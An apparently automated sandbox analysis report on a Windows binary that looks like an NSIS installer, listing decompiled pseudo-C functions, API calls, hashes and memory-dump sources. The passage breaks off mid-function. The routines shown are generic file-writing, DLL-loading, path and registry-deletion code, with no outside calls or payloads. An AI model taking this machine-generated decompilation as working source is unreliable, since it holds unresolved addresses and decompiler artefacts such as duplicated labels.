                                                                                                    • Opcode ID: a19141f3df1e0a3c8b8c2abcbd515ef60a2dd56e778219f0b9cb34bd20a9fb2d
                                                                                                    • Instruction ID: 39266fd7d8b3d51d4259f470751267aa52f8e49dbca779dff7f29341b6a717b4
                                                                                                    • Opcode Fuzzy Hash: a19141f3df1e0a3c8b8c2abcbd515ef60a2dd56e778219f0b9cb34bd20a9fb2d
                                                                                                    • Instruction Fuzzy Hash: AFF03671900109ABEF255F51DD0ABEE3779FB00305F008036FA05B51D1D7F9AA559F99
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00403043, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 108fileCOMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 92%
                                                                                                    			E00403043(intOrPtr _a4) {
				long _v4;
				void* __ecx;
				intOrPtr _t13;
				signed int _t14;
				void* _t17;
				long _t18;
				intOrPtr _t34;
				intOrPtr _t37;
				long _t40;

				_t37 =  *0x417044 -  *0x40afb0 + _a4;
				 *0x423eac = GetTickCount() + 0x1f4;
				if(_t37 <= 0) {
					L23:
					E00402BD3(1);
					return 0;
				}
				E004031F1( *0x41f054);
				SetFilePointer( *0x409018,  *0x40afb0, 0, 0);
				 *0x41f050 = _t37;
				 *0x417040 = 0;
				while(1) {
					_t34 = 0x4000;
					_t13 =  *0x417048 -  *0x41f054;
					if(_t13 <= 0x4000) {
						_t34 = _t13;
					}
					_t14 = E004031BF(0x413040, _t34);
					if(_t14 == 0) {
						break;
					}
					 *0x41f054 =  *0x41f054 + _t34;
					 *0x40afd0 = 0x413040;
					 *0x40afd4 = _t34;
					L6:
					L6:
					if( *0x423eb0 != 0 &&  *0x423f40 == 0) {
						 *0x417040 =  *0x41f050 -  *0x417044 - _a4 +  *0x40afb0;
						E00402BD3(0);
					}
					 *0x40afd8 = 0x40b040;
					 *0x40afdc = 0x8000;
					if(E00405F82(0x40afb8) < 0) {
						goto L21;
					}
					_t40 =  *0x40afd8 - 0x40b040;
					if(_t40 == 0) {
						if( *0x40afd4 != 0 || _t34 == 0) {
							goto L21;
						} else {
							L17:
							_t18 =  *0x417044;
							if(_t18 -  *0x40afb0 + _a4 > 0) {
								continue;
							}
							SetFilePointer( *0x409018, _t18, 0, 0);
							goto L23;
						}
					}
					if(WriteFile( *0x409018, 0x40b040, _t40,  &_v4, 0) == 0 || _t40 != _v4) {
						_push(0xfffffffe);
						L22:
						_pop(_t17);
						return _t17;
					} else {
						 *0x40afb0 =  *0x40afb0 + _t40;
						if( *0x40afd4 != 0) {
							goto L6;
						}
						goto L17;
					}
					L21:
					_push(0xfffffffd);
					goto L22;
				}
				return _t14 | 0xffffffff;
			}












                                                                                                    0x00403054
                                                                                                    0x00403067
                                                                                                    0x0040306c
                                                                                                    0x004031ad
                                                                                                    0x004031af
                                                                                                    0x00000000
                                                                                                    0x004031b5
                                                                                                    0x00403078
                                                                                                    0x0040308b
                                                                                                    0x00403091
                                                                                                    0x00403097
                                                                                                    0x004030a2
                                                                                                    0x004030a7
                                                                                                    0x004030ac
                                                                                                    0x004030b4
                                                                                                    0x004030b6
                                                                                                    0x004030b6
                                                                                                    0x004030bf
                                                                                                    0x004030c6
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x004030cc
                                                                                                    0x004030d2
                                                                                                    0x004030d8
                                                                                                    0x00000000
                                                                                                    0x004030de
                                                                                                    0x004030e4
                                                                                                    0x00403104
                                                                                                    0x00403109
                                                                                                    0x0040310e
                                                                                                    0x00403114
                                                                                                    0x0040311a
                                                                                                    0x0040312b
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00403133
                                                                                                    0x00403135
                                                                                                    0x0040316f
                                                                                                    0x00000000
                                                                                                    0x00403175
                                                                                                    0x00403175
                                                                                                    0x00403175
                                                                                                    0x00403188
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00403197
                                                                                                    0x00000000
                                                                                                    0x00403197
                                                                                                    0x0040316f
                                                                                                    0x0040314d
                                                                                                    0x004031a4
                                                                                                    0x004031aa
                                                                                                    0x004031aa
                                                                                                    0x00000000
                                                                                                    0x00403155
                                                                                                    0x00403155
                                                                                                    0x00403161
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00403167
                                                                                                    0x004031a8
                                                                                                    0x004031a8
                                                                                                    0x00000000
                                                                                                    0x004031a8
                                                                                                    0x00000000

                                                                                                    APIs
                                                                                                    • GetTickCount.KERNEL32 ref: 00403058
                                                                                                      • Part of subcall function 004031F1: SetFilePointer.KERNEL32(00000000,00000000,00000000,00402E9D,?), ref: 004031FF
                                                                                                    • SetFilePointer.KERNEL32(00000000,00000000,?,00000000,?,00402F4E,00000004,00000000,00000000,00000000,?,?,?,00402EC4,000000FF,00000000), ref: 0040308B
                                                                                                    • WriteFile.KERNEL32(0040B040,?,00000000,00000000,00413040,00004000,?,00000000,?,00402F4E,00000004,00000000,00000000,00000000,?,?), ref: 00403145
                                                                                                    • SetFilePointer.KERNEL32(?,00000000,00000000,00413040,00004000,?,00000000,?,00402F4E,00000004,00000000,00000000,00000000,?,?), ref: 00403197
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.429792160.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.429781321.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.429813163.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.429828354.0000000000409000.00000008.00020000.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.429836549.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                    Similarity
                                                                                                    • API ID: File$Pointer$CountTickWrite
                                                                                                    • String ID: @0A
                                                                                                    • API String ID: 2146148272-1363546919
                                                                                                    • Opcode ID: 5717bb92db8eceb84bcfa3312431b9880db34fb8e18b0e02550951cbdd57df69
                                                                                                    • Instruction ID: c862c83604f3b109b9ae356e59bf9e99270c6d64ee518f880403d0392c1b0dc8
                                                                                                    • Opcode Fuzzy Hash: 5717bb92db8eceb84bcfa3312431b9880db34fb8e18b0e02550951cbdd57df69
                                                                                                    • Instruction Fuzzy Hash: 4B41ABB25042029FD710CF29EE4096A7FBDF748356705423BE501BA2E1CB3C6E099B9E
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00401F51, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73libraryloaderCOMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 59%
                                                                                                    			E00401F51(void* __ebx, void* __eflags) {
				void* _t27;
				struct HINSTANCE__* _t30;
				CHAR* _t32;
				intOrPtr* _t33;
				void* _t34;

				_t27 = __ebx;
				asm("sbb eax, 0x423f58");
				 *(_t34 - 4) = 1;
				if(__eflags < 0) {
					_push(0xffffffe7);
					L15:
					E00401423();
					L16:
					 *0x423f28 =  *0x423f28 +  *(_t34 - 4);
					return 0;
				}
				_t32 = E004029F6(0xfffffff0);
				 *(_t34 + 8) = E004029F6(1);
				if( *((intOrPtr*)(_t34 - 0x14)) == __ebx) {
					L3:
					_t30 = LoadLibraryExA(_t32, _t27, 8);
					if(_t30 == _t27) {
						_push(0xfffffff6);
						goto L15;
					}
					L4:
					_t33 = GetProcAddress(_t30,  *(_t34 + 8));
					if(_t33 == _t27) {
						E00404F04(0xfffffff7,  *(_t34 + 8));
					} else {
						 *(_t34 - 4) = _t27;
						if( *((intOrPtr*)(_t34 - 0x1c)) == _t27) {
							 *_t33( *((intOrPtr*)(_t34 - 0x34)), 0x400, 0x424000, 0x40af70, " ?B");
						} else {
							E00401423( *((intOrPtr*)(_t34 - 0x1c)));
							if( *_t33() != 0) {
								 *(_t34 - 4) = 1;
							}
						}
					}
					if( *((intOrPtr*)(_t34 - 0x18)) == _t27 && E0040364F(_t30) != 0) {
						FreeLibrary(_t30);
					}
					goto L16;
				}
				_t30 = GetModuleHandleA(_t32);
				if(_t30 != __ebx) {
					goto L4;
				}
				goto L3;
			}








                                                                                                    0x00401f51
                                                                                                    0x00401f51
                                                                                                    0x00401f56
                                                                                                    0x00401f5d
                                                                                                    0x00402019
                                                                                                    0x00402164
                                                                                                    0x00402164
                                                                                                    0x0040288b
                                                                                                    0x0040288e
                                                                                                    0x0040289a
                                                                                                    0x0040289a
                                                                                                    0x00401f6c
                                                                                                    0x00401f76
                                                                                                    0x00401f79
                                                                                                    0x00401f88
                                                                                                    0x00401f92
                                                                                                    0x00401f96
                                                                                                    0x00402012
                                                                                                    0x00000000
                                                                                                    0x00402012
                                                                                                    0x00401f98
                                                                                                    0x00401fa2
                                                                                                    0x00401fa6
                                                                                                    0x00401fea
                                                                                                    0x00401fa8
                                                                                                    0x00401fab
                                                                                                    0x00401fae
                                                                                                    0x00401fde
                                                                                                    0x00401fb0
                                                                                                    0x00401fb3
                                                                                                    0x00401fbc
                                                                                                    0x00401fbe
                                                                                                    0x00401fbe
                                                                                                    0x00401fbc
                                                                                                    0x00401fae
                                                                                                    0x00401ff2
                                                                                                    0x00402007
                                                                                                    0x00402007
                                                                                                    0x00000000
                                                                                                    0x00401ff2
                                                                                                    0x00401f82
                                                                                                    0x00401f86
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000

                                                                                                    APIs
                                                                                                    • GetModuleHandleA.KERNEL32(00000000,00000001,000000F0), ref: 00401F7C
                                                                                                      • Part of subcall function 00404F04: lstrlenA.KERNEL32(0041FC78,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C4A,00000000,?), ref: 00404F3D
                                                                                                      • Part of subcall function 00404F04: lstrlenA.KERNEL32(00402C4A,0041FC78,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C4A,00000000), ref: 00404F4D
                                                                                                      • Part of subcall function 00404F04: lstrcatA.KERNEL32(0041FC78,00402C4A,00402C4A,0041FC78,00000000,00000000,00000000), ref: 00404F60
                                                                                                      • Part of subcall function 00404F04: SetWindowTextA.USER32(0041FC78,0041FC78), ref: 00404F72
                                                                                                      • Part of subcall function 00404F04: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404F98
                                                                                                      • Part of subcall function 00404F04: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404FB2
                                                                                                      • Part of subcall function 00404F04: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404FC0
                                                                                                    • LoadLibraryExA.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00401F8C
                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 00401F9C
                                                                                                    • FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 00402007
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.429792160.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.429781321.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.429813163.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.429828354.0000000000409000.00000008.00020000.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.429836549.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                                                                                    • String ID: ?B
                                                                                                    • API String ID: 2987980305-117478770
                                                                                                    • Opcode ID: fac2ec467ce49baf42d4c1522dc92fc20d3b0d8765c88ba1bcd4c9fe8e04de6f
                                                                                                    • Instruction ID: 83c29b7dad20212888764ed045f323035a642c1bbb84e8da84d377f5f563bf0e
                                                                                                    • Opcode Fuzzy Hash: fac2ec467ce49baf42d4c1522dc92fc20d3b0d8765c88ba1bcd4c9fe8e04de6f
                                                                                                    • Instruction Fuzzy Hash: D621EE72D04216EBCF207FA4DE49A6E75B06B44399F204237F511B52E0D77C4D41965E
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00405DC8, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 69COMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 100%
                                                                                                    			E00405DC8(CHAR* _a4) {
				char _t5;
				char _t7;
				char* _t15;
				char* _t16;
				CHAR* _t17;

				_t17 = _a4;
				if( *_t17 == 0x5c && _t17[1] == 0x5c && _t17[2] == 0x3f && _t17[3] == 0x5c) {
					_t17 =  &(_t17[4]);
				}
				if( *_t17 != 0 && E004056C6(_t17) != 0) {
					_t17 =  &(_t17[2]);
				}
				_t5 =  *_t17;
				_t15 = _t17;
				_t16 = _t17;
				if(_t5 != 0) {
					do {
						if(_t5 > 0x1f &&  *((char*)(E00405684("*?|<>/\":", _t5))) == 0) {
							E004057FE(_t16, _t17, CharNextA(_t17) - _t17);
							_t16 = CharNextA(_t16);
						}
						_t17 = CharNextA(_t17);
						_t5 =  *_t17;
					} while (_t5 != 0);
				}
				 *_t16 =  *_t16 & 0x00000000;
				while(1) {
					_t16 = CharPrevA(_t15, _t16);
					_t7 =  *_t16;
					if(_t7 != 0x20 && _t7 != 0x5c) {
						break;
					}
					 *_t16 =  *_t16 & 0x00000000;
					if(_t15 < _t16) {
						continue;
					}
					break;
				}
				return _t7;
			}








                                                                                                    0x00405dca
                                                                                                    0x00405dd2
                                                                                                    0x00405de6
                                                                                                    0x00405de6
                                                                                                    0x00405dec
                                                                                                    0x00405df9
                                                                                                    0x00405df9
                                                                                                    0x00405dfa
                                                                                                    0x00405dfc
                                                                                                    0x00405e00
                                                                                                    0x00405e02
                                                                                                    0x00405e0b
                                                                                                    0x00405e0d
                                                                                                    0x00405e27
                                                                                                    0x00405e2f
                                                                                                    0x00405e2f
                                                                                                    0x00405e34
                                                                                                    0x00405e36
                                                                                                    0x00405e38
                                                                                                    0x00405e3c
                                                                                                    0x00405e3d
                                                                                                    0x00405e40
                                                                                                    0x00405e48
                                                                                                    0x00405e4a
                                                                                                    0x00405e4e
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00405e54
                                                                                                    0x00405e59
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00405e59
                                                                                                    0x00405e5e

                                                                                                    APIs
                                                                                                    • CharNextA.USER32(?,*?|<>/":,00000000,0042A400,00429000,0042A400,00000000,00403214,0042A400,00000000,00403386), ref: 00405E20
                                                                                                    • CharNextA.USER32(?,?,?,00000000), ref: 00405E2D
                                                                                                    • CharNextA.USER32(?,0042A400,00429000,0042A400,00000000,00403214,0042A400,00000000,00403386), ref: 00405E32
                                                                                                    • CharPrevA.USER32(?,?,00429000,0042A400,00000000,00403214,0042A400,00000000,00403386), ref: 00405E42
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.429792160.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.429781321.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.429813163.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.429828354.0000000000409000.00000008.00020000.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.429836549.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                    Similarity
                                                                                                    • API ID: Char$Next$Prev
                                                                                                    • String ID: *?|<>/":
                                                                                                    • API String ID: 589700163-165019052
                                                                                                    • Opcode ID: d60fa47d96b079028a76cfcdb2d30976ede71f36b1f4f1e1bc9c50cb25bd2be5
                                                                                                    • Instruction ID: 3b6179abbfe29fc78842bf11aa846075366cc437f950451d76d565b88bc2b460
                                                                                                    • Opcode Fuzzy Hash: d60fa47d96b079028a76cfcdb2d30976ede71f36b1f4f1e1bc9c50cb25bd2be5
                                                                                                    • Instruction Fuzzy Hash: A0110861805B9129EB3227284C48BBB7F89CF66754F18447FD8C4722C2C67C5D429FAD
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00401734, Relevance: 7.6, APIs: 5, Instructions: 147stringtimeCOMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 75%
                                                                                                    			E00401734(FILETIME* __ebx, void* __eflags) {
				void* _t33;
				void* _t41;
				void* _t43;
				FILETIME* _t49;
				FILETIME* _t62;
				void* _t64;
				signed int _t70;
				FILETIME* _t71;
				FILETIME* _t75;
				signed int _t77;
				void* _t80;
				CHAR* _t82;
				void* _t85;

				_t75 = __ebx;
				_t82 = E004029F6(0x31);
				 *(_t85 - 8) = _t82;
				 *(_t85 + 8) =  *(_t85 - 0x24) & 0x00000007;
				_t33 = E004056C6(_t82);
				_push(_t82);
				if(_t33 == 0) {
					lstrcatA(E00405659(E00405B66(0x409b70, 0x429800)), ??);
				} else {
					_push(0x409b70);
					E00405B66();
				}
				E00405DC8(0x409b70);
				while(1) {
					__eflags =  *(_t85 + 8) - 3;
					if( *(_t85 + 8) >= 3) {
						_t64 = E00405E61(0x409b70);
						_t77 = 0;
						__eflags = _t64 - _t75;
						if(_t64 != _t75) {
							_t71 = _t64 + 0x14;
							__eflags = _t71;
							_t77 = CompareFileTime(_t71, _t85 - 0x18);
						}
						asm("sbb eax, eax");
						_t70 =  ~(( *(_t85 + 8) + 0xfffffffd | 0x80000000) & _t77) + 1;
						__eflags = _t70;
						 *(_t85 + 8) = _t70;
					}
					__eflags =  *(_t85 + 8) - _t75;
					if( *(_t85 + 8) == _t75) {
						E0040581E(0x409b70);
					}
					__eflags =  *(_t85 + 8) - 1;
					_t41 = E0040583D(0x409b70, 0x40000000, (0 |  *(_t85 + 8) != 0x00000001) + 1);
					__eflags = _t41 - 0xffffffff;
					 *(_t85 - 0x34) = _t41;
					if(_t41 != 0xffffffff) {
						break;
					}
					__eflags =  *(_t85 + 8) - _t75;
					if( *(_t85 + 8) != _t75) {
						E00404F04(0xffffffe2,  *(_t85 - 8));
						__eflags =  *(_t85 + 8) - 2;
						if(__eflags == 0) {
							 *((intOrPtr*)(_t85 - 4)) = 1;
						}
						L31:
						 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t85 - 4));
						__eflags =  *0x423f28;
						goto L32;
					} else {
						E00405B66(0x40a370, 0x424000);
						E00405B66(0x424000, 0x409b70);
						E00405B88(_t75, 0x40a370, 0x409b70, 0x409f70,  *((intOrPtr*)(_t85 - 0x10)));
						E00405B66(0x424000, 0x40a370);
						_t62 = E00405427(0x409f70,  *(_t85 - 0x24) >> 3) - 4;
						__eflags = _t62;
						if(_t62 == 0) {
							continue;
						} else {
							__eflags = _t62 == 1;
							if(_t62 == 1) {
								 *0x423f28 =  &( *0x423f28->dwLowDateTime);
								L32:
								_t49 = 0;
								__eflags = 0;
							} else {
								_push(0x409b70);
								_push(0xfffffffa);
								E00404F04();
								L29:
								_t49 = 0x7fffffff;
							}
						}
					}
					L33:
					return _t49;
				}
				E00404F04(0xffffffea,  *(_t85 - 8));
				 *0x423f54 =  *0x423f54 + 1;
				_t43 = E00402F18(_t77,  *((intOrPtr*)(_t85 - 0x1c)),  *(_t85 - 0x34), _t75, _t75);
				 *0x423f54 =  *0x423f54 - 1;
				__eflags =  *(_t85 - 0x18) - 0xffffffff;
				_t80 = _t43;
				if( *(_t85 - 0x18) != 0xffffffff) {
					L22:
					SetFileTime( *(_t85 - 0x34), _t85 - 0x18, _t75, _t85 - 0x18);
				} else {
					__eflags =  *((intOrPtr*)(_t85 - 0x14)) - 0xffffffff;
					if( *((intOrPtr*)(_t85 - 0x14)) != 0xffffffff) {
						goto L22;
					}
				}
				CloseHandle( *(_t85 - 0x34));
				__eflags = _t80 - _t75;
				if(_t80 >= _t75) {
					goto L31;
				} else {
					__eflags = _t80 - 0xfffffffe;
					if(_t80 != 0xfffffffe) {
						E00405B88(_t75, _t80, 0x409b70, 0x409b70, 0xffffffee);
					} else {
						E00405B88(_t75, _t80, 0x409b70, 0x409b70, 0xffffffe9);
						lstrcatA(0x409b70,  *(_t85 - 8));
					}
					_push(0x200010);
					_push(0x409b70);
					E00405427();
					goto L29;
				}
				goto L33;
			}
















                                                                                                    0x00401734
                                                                                                    0x0040173b
                                                                                                    0x00401744
                                                                                                    0x00401747
                                                                                                    0x0040174a
                                                                                                    0x0040174f
                                                                                                    0x00401757
                                                                                                    0x00401773
                                                                                                    0x00401759
                                                                                                    0x00401759
                                                                                                    0x0040175a
                                                                                                    0x0040175a
                                                                                                    0x00401779
                                                                                                    0x00401783
                                                                                                    0x00401783
                                                                                                    0x00401787
                                                                                                    0x0040178a
                                                                                                    0x0040178f
                                                                                                    0x00401791
                                                                                                    0x00401793
                                                                                                    0x00401798
                                                                                                    0x00401798
                                                                                                    0x004017a3
                                                                                                    0x004017a3
                                                                                                    0x004017b4
                                                                                                    0x004017b6
                                                                                                    0x004017b6
                                                                                                    0x004017b7
                                                                                                    0x004017b7
                                                                                                    0x004017ba
                                                                                                    0x004017bd
                                                                                                    0x004017c0
                                                                                                    0x004017c0
                                                                                                    0x004017c7
                                                                                                    0x004017d6
                                                                                                    0x004017db
                                                                                                    0x004017de
                                                                                                    0x004017e1
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x004017e3
                                                                                                    0x004017e6
                                                                                                    0x00401840
                                                                                                    0x00401845
                                                                                                    0x004015a8
                                                                                                    0x0040265c
                                                                                                    0x0040265c
                                                                                                    0x0040288b
                                                                                                    0x0040288e
                                                                                                    0x0040288e
                                                                                                    0x00000000
                                                                                                    0x004017e8
                                                                                                    0x004017ee
                                                                                                    0x004017f9
                                                                                                    0x00401806
                                                                                                    0x00401811
                                                                                                    0x00401827
                                                                                                    0x00401827
                                                                                                    0x0040182a
                                                                                                    0x00000000
                                                                                                    0x00401830
                                                                                                    0x00401830
                                                                                                    0x00401831
                                                                                                    0x0040184e
                                                                                                    0x00402894
                                                                                                    0x00402894
                                                                                                    0x00402894
                                                                                                    0x00401833
                                                                                                    0x00401833
                                                                                                    0x00401834
                                                                                                    0x00401492
                                                                                                    0x0040220e
                                                                                                    0x0040220e
                                                                                                    0x0040220e
                                                                                                    0x00401831
                                                                                                    0x0040182a
                                                                                                    0x00402896
                                                                                                    0x0040289a
                                                                                                    0x0040289a
                                                                                                    0x0040185e
                                                                                                    0x00401863
                                                                                                    0x00401871
                                                                                                    0x00401876
                                                                                                    0x0040187c
                                                                                                    0x00401880
                                                                                                    0x00401882
                                                                                                    0x0040188a
                                                                                                    0x00401896
                                                                                                    0x00401884
                                                                                                    0x00401884
                                                                                                    0x00401888
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00401888
                                                                                                    0x0040189f
                                                                                                    0x004018a5
                                                                                                    0x004018a7
                                                                                                    0x00000000
                                                                                                    0x004018ad
                                                                                                    0x004018ad
                                                                                                    0x004018b0
                                                                                                    0x004018c8
                                                                                                    0x004018b2
                                                                                                    0x004018b5
                                                                                                    0x004018be
                                                                                                    0x004018be
                                                                                                    0x004018cd
                                                                                                    0x004018d2
                                                                                                    0x00402209
                                                                                                    0x00000000
                                                                                                    0x00402209
                                                                                                    0x00000000

                                                                                                    APIs
                                                                                                    • lstrcatA.KERNEL32(00000000,00000000,00409B70,00429800,00000000,00000000,00000031), ref: 00401773
                                                                                                    • CompareFileTime.KERNEL32(-00000014,?,00409B70,00409B70,00000000,00000000,00409B70,00429800,00000000,00000000,00000031), ref: 0040179D
                                                                                                      • Part of subcall function 00405B66: lstrcpynA.KERNEL32(?,?,00000400,004032AA,004236A0,NSIS Error), ref: 00405B73
                                                                                                      • Part of subcall function 00404F04: lstrlenA.KERNEL32(0041FC78,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C4A,00000000,?), ref: 00404F3D
                                                                                                      • Part of subcall function 00404F04: lstrlenA.KERNEL32(00402C4A,0041FC78,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C4A,00000000), ref: 00404F4D
                                                                                                      • Part of subcall function 00404F04: lstrcatA.KERNEL32(0041FC78,00402C4A,00402C4A,0041FC78,00000000,00000000,00000000), ref: 00404F60
                                                                                                      • Part of subcall function 00404F04: SetWindowTextA.USER32(0041FC78,0041FC78), ref: 00404F72
                                                                                                      • Part of subcall function 00404F04: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404F98
                                                                                                      • Part of subcall function 00404F04: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404FB2
                                                                                                      • Part of subcall function 00404F04: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404FC0
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.429792160.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.429781321.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.429813163.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.429828354.0000000000409000.00000008.00020000.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.429836549.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                    • String ID:
                                                                                                    • API String ID: 1941528284-0
                                                                                                    • Opcode ID: 7e13bad854fddeb55fa2929aff0ffc3a5c93114e1649d47e1deeff05be23e6f2
                                                                                                    • Instruction ID: ca24b6133afb507e547736dc5ab02d451b7f1a2d30e0a517c5ad6537af4b780a
                                                                                                    • Opcode Fuzzy Hash: 7e13bad854fddeb55fa2929aff0ffc3a5c93114e1649d47e1deeff05be23e6f2
                                                                                                    • Instruction Fuzzy Hash: 8441C131900515BBCB10BFB5DD46EAF3A79EF01369B24433BF511B11E1D63C9A418AAD
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00402A36, Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 84%
                                                                                                    			E00402A36(void* _a4, char* _a8, intOrPtr _a12) {
				void* _v8;
				char _v272;
				long _t18;
				intOrPtr* _t27;
				long _t28;

				_t18 = RegOpenKeyExA(_a4, _a8, 0,  *0x423f50 | 0x00000008,  &_v8);
				if(_t18 == 0) {
					while(RegEnumKeyA(_v8, 0,  &_v272, 0x105) == 0) {
						if(_a12 != 0) {
							RegCloseKey(_v8);
							L8:
							return 1;
						}
						if(E00402A36(_v8,  &_v272, 0) != 0) {
							break;
						}
					}
					RegCloseKey(_v8);
					_t27 = E00405E88(2);
					if(_t27 == 0) {
						if( *0x423f50 != 0) {
							goto L8;
						}
						_t28 = RegDeleteKeyA(_a4, _a8);
						if(_t28 != 0) {
							goto L8;
						}
						return _t28;
					}
					return  *_t27(_a4, _a8,  *0x423f50, 0);
				}
				return _t18;
			}








                                                                                                    0x00402a57
                                                                                                    0x00402a5f
                                                                                                    0x00402a87
                                                                                                    0x00402a71
                                                                                                    0x00402ac1
                                                                                                    0x00402ac7
                                                                                                    0x00000000
                                                                                                    0x00402ac9
                                                                                                    0x00402a85
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00402a85
                                                                                                    0x00402a9c
                                                                                                    0x00402aa4
                                                                                                    0x00402aab
                                                                                                    0x00402ad7
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00402adf
                                                                                                    0x00402ae7
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00402ae7
                                                                                                    0x00000000
                                                                                                    0x00402aba
                                                                                                    0x00402ace

                                                                                                    APIs
                                                                                                    • RegOpenKeyExA.ADVAPI32(?,?,00000000,?,?), ref: 00402A57
                                                                                                    • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402A93
                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00402A9C
                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00402AC1
                                                                                                    • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402ADF
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.429792160.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.429781321.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.429813163.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.429828354.0000000000409000.00000008.00020000.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.429836549.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                    Similarity
                                                                                                    • API ID: Close$DeleteEnumOpen
                                                                                                    • String ID:
                                                                                                    • API String ID: 1912718029-0
                                                                                                    • Opcode ID: 90165163457562f2d2db0d0e016cf4740f9c141c2854e05e69f214c53397e3bf
                                                                                                    • Instruction ID: 3ec7b1818cbfc33efeafaf7017db19c7c479205e5d6f4ff66fb244667a93d6f3
                                                                                                    • Opcode Fuzzy Hash: 90165163457562f2d2db0d0e016cf4740f9c141c2854e05e69f214c53397e3bf
                                                                                                    • Instruction Fuzzy Hash: 93112971A00009FFDF319F90DE49EAF7B7DEB44385B104436F905A10A0DBB59E51AE69
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00401CC1, Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 100%
                                                                                                    			E00401CC1(int __edx) {
				void* _t17;
				struct HINSTANCE__* _t21;
				struct HWND__* _t25;
